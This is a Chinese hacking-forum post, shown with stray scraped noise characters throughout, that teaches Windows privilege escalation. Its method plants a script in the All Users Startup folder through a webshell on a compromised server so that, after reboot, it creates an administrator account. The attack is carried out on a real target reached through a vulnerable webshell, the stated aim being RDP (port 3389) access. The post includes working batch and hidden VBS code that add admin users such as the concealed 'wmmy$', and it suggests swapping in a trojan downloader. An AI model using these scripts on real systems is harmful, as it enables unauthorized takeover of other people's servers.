- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
& I; U, \- B( `% g. {6 L5 e启动 提权
1 v2 D% B5 @# L3 h& c& q& [C:\Docume~1\All Users\「开始」菜单\程序\启动
7 [- r. k' n, J5 R6 @0 |# G7 J& @在这里必须有写入权限 否则此方法无效
~& r8 {& K# R8 r( W1 R% @1 A: @因为我是在网吧 这里显示不了路径( Q' M( {/ [2 w4 l1 g
我去服务器上演示给大家看
2 D% t' c6 W0 D大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的3 o- z4 F+ `4 t- b3 `" e
文件 从而运行我们的文件
- }: N8 H8 j! n a+ S这里有两中方式 第一种是批处理
# \* v% {9 a" U) c我们来看下目前 我机器上的用户组$ k; S P5 ~. f1 `2 D1 Q
目前我们没有521这个用户+ H' K' r) t+ T: k
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示7 B* u, R: P" l3 @7 F- c( ?
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现6 R, r3 y3 Y$ o3 s
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的5 b8 ^, N6 z5 n f. q# z* o9 S; B4 L
大家看 已经成功加入了WMMY用户
5 |$ m T O' b. {1 U% I8 S网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
- `/ N3 X# _) `" Q当前终端服务端口: 3389
7 o+ _3 L c# G/ e# s {系统自动登录功能未开启3 b" x5 t' v8 `1 w5 x/ f
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了3 q* Z: A! t" C
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径! L# Z) P/ c: N: k
第一种隐蔽性太差 我们就用第二种吧4 R/ ]6 x' x$ H$ \" u! Q
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
/ ~. i" Y/ l% _2 @! N2 e: J从而取得了3389的登陆权限
+ @0 E7 W* w8 G, m其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
! A9 d& f6 ?1 L8 B5 Q% i1 d; T8 `基本原理都差不多 我就不多介绍了( _! ?5 e A% N5 k
教程结束```9 g& p& c6 S# V/ N" g
@echo off" X2 w! q7 a* K. q/ d3 u: C
net user 521 521 /add
% X( f( ~/ h" C$ c! X+ O8 Y; Anet localgroup administrators 521 /add
" ^6 T/ d2 \, H" g Q7 J
$ ?; j3 B, I4 G. `on Error Resume next
2 a8 x0 Y! L1 k5 kset wshshell=createobject("wscript.shell")/ I& {5 }8 F6 f0 ~
a=wshshell.run("net user wmmy$ 1227 /add",0)1 z$ Y2 x! \9 U/ H, F, R& z! ?2 R0 r
a=wshshell.run("net localgroup administrators wmmy$ /add",0)8 A2 V5 g+ C7 C0 Z& j
6 g* F* T' X5 Y
% a" Q. p0 Z% h7 J% C% P* Z点击下载* S2 ]: X4 m. E7 O. r
|
-
2
评分人数
-
|